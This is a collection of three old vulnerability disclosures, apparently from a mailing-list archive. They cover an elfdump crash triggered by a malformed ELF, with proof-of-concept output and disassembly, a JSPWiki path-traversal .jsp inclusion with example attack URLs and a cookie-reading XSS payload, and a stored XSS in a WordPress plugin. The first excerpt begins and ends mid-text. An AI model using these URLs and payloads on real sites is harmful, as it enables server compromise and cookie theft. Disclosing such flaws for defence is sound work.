static __inline uint32_t
le32dec(const void *pp)
{
unsigned char const *p = (unsigned char const *)pp;
return ((p[3] << 24) | (p[2] << 16) | (p[1] << 8) | p[0]);
}
This function accesses the memory values of pp, if pp is not a readable
address the application crashes with Segmentation fault: 11
In other words, if we create an evil ELF with an evil e_shoff the
application crashes. (Also it is possible to create evil shstrndx,
shentsize ...)
I create a POC exploit which creates an evil ELF to crash elfdump.
In this exploit the values of shstrndx and shentsize are filled with 0 for
simplicity.
Compile & execute:
[Dreg@ ~/vuln]# gcc -pedantic -ansi-c -o xpl xpl.c
[Dreg@ ~/vuln]# ./xpl -f pocdump && echo "-" && \
echo " Executing elfdump:" && elfdump -a pocdump
__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c,
v 1.12.8.2 2006/01/28 18:40:55 marcel Exp $");
--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--
Note: run it with -h parameter to show help.
Evil ELF written using e_shoff: 16777215, at: pocdump
Now, try elfdump -a pocdump
-
Executing elfdump:
Segmentation fault: 11 (core dumped)
Low level area
The ASM code of le32dec is:
loc_80488DC:
movzx edx, byte ptr [ebx+3]
movzx eax, byte ptr [ebx+2]
shl eax, 10h
shl edx, 18h
or edx, eax
movzx eax, byte ptr [ebx+1]
shl eax, 8
or edx, eax
movzx eax, byte ptr [ebx]
If [EBX], [EBX+2], [EBX+3] or [EBX+1] are a memory non readable the
application crashes.
Note
This POC exploit may crash the application in some other memory address as
well as 0x80488DC, for example:
[Dreg@ ~/vuln]# ./xpl -o 20 -f petadump && echo "-" && \
echo " Executing elfdump:" && elfdump -a petadump
__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c,
v 1.12.8.2 2006/01/28 18:40:55 marcel Exp $");
--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--
Note: run it with -h parameter to show help.
Evil ELF written using e_shoff: 20, at: petadump
Now, try: elfdump -a petadump
-
Executing elfdump:
elf header:
Segmentation fault: 11 (core dumped)
In this case the application crashes at 0x28132f4f:
0x28132f4
JSPWiki Multiple Vulnerabilities
JSPWiki Multiple Vulnerabilities Vendor: Janne Jalkanen JSPWiki – http://www.jspwiki.org Application Description: From JSPWiki website - “JSPWiki is a feature-rich and extensible WikiWiki engine built around a standart J2EE components (Java, servlets, JSP).” Tested versions: JSPWiki v2.4.104 JSPWiki v2.5.139 Earlier versions may also be affected. JSPWiki Local .jsp File Inclusion Vulnerability. An input validation problem exists within JSPWiki which allows to execute (include) arbitrary local .jsp files. An attacker may leverage this issue to execute arbitrary server-side script code on a vulnerable server with the privileges of the web server process. Example (including rss.jsp file from the application root directory): http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss Note: page parameter must be an existing page on the server. This grants an attacker unauthorized access to sensitive .jsp files on the server and can lead to information disclosure. Examples: http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig The first example disclose sensitive information such as the full path of the application on the server, page (and attachments) storage path, log files and work directory by including the application installation (Install.jsp). The second example disclose the application security configurations by including the JSPWiki Security Configuration Verifier file (admin/SecurityConfig.jsp). In addition, JSPWiki allow users to upload (attach) files to entry pages. An attacker can use the information disclosed by the installation file to upload a malicious .jsp file and locally execute it. By executing malicious server-side code, an attacker may be able to compromise the server. JSPWiki Cross-Site Scripting Vulnerability. An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. Example: http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E Original Document: http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0 Download PDF: http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf Credit: Moshe BA BugSec LTD. - Security Consulting Company Tel: +972-3-9622655 Fax: +972-3-9511433 Email: Info -at- BugSec -d0t- com http://www.bugsec.com -- Moshe :: Trancer 0nly Human.
Search Unleashed 0.2.10 JavaScript injection (Wordpress plugin)
Hello all, There is a bug in "Log" function of Search Unleashed by John Godley, version 0.2.10. This plug-in stores search queries but does not validates stored data and put them back "raw" to browser. HTML and Java Script can be injected with search request: /blog/?s=%3Ctextarea+onmouseover%3D%22alert%28document.cookie%29%3B%22%3E%3C%2Ftextarea%3E&searchbutton=go%21 To execute injected code admin have to go to Manage -> Search Unleashed -> Log (and in my example point his cursor to text area). Author was notified by his bug tracker: http://urbangiraffe.com/tracker/issues/show/60 Regards, -- Krzysztof Burghardt <[EMAIL PROTECTED]> http://www.burghardt.pl/
